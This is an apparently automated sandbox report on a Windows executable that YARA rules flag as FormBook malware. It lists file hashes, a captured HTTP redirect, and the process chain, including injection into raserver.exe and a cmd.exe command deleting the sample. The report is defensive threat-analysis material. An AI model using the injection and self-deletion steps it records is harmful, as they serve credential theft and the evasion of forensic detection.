Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.2</center></body></html>


Code Manipulations

Statistics

Behavior
System Behavior

General

Start time: 15:42:08
Start date: 11/06/2021
Path: C:\Users\user\Desktop\OrderKLB210568.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\OrderKLB210568.exe'
Imagebase: 0x400000
File size: 221568 bytes
MD5 hash: 759B0D51F128F54E516AD1941A896D77
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.667634881.00000000022B0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.667634881.00000000022B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.667634881.00000000022B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 15:42:09
Start date: 11/06/2021
Path: C:\Users\user\Desktop\OrderKLB210568.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\OrderKLB210568.exe'
Imagebase: 0x400000
File size: 221568 bytes
MD5 hash: 759B0D51F128F54E516AD1941A896D77
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.720819414.00000000009D0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.720819414.00000000009D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.720819414.00000000009D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.720216113.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.720216113.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.720216113.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.664276844.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.664276844.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.664276844.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.720881114.0000000000A00000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.720881114.0000000000A00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.720881114.0000000000A00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 15:42:14
Start date: 11/06/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline:
Imagebase: 0x7ff6fee60000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 15:42:35
Start date: 11/06/2021
Path: C:\Windows\SysWOW64\raserver.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\raserver.exe
Imagebase: 0x12b0000
File size: 108544 bytes
MD5 hash: 2AADF65E395BFBD0D9B71D7279C8B5EC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.922673360.0000000001250000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.922673360.0000000001250000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.922673360.0000000001250000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.922695254.0000000001280000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.922695254.0000000001280000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.922695254.0000000001280000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.922550809.0000000001000000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.922550809.0000000001000000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.922550809.0000000001000000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

General

Start time: 15:42:39
Start date: 11/06/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\user\Desktop\OrderKLB210568.exe'
Imagebase: 0x11d0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 15:42:40
Start date: 11/06/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff724c50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Disassembly

Code Analysis
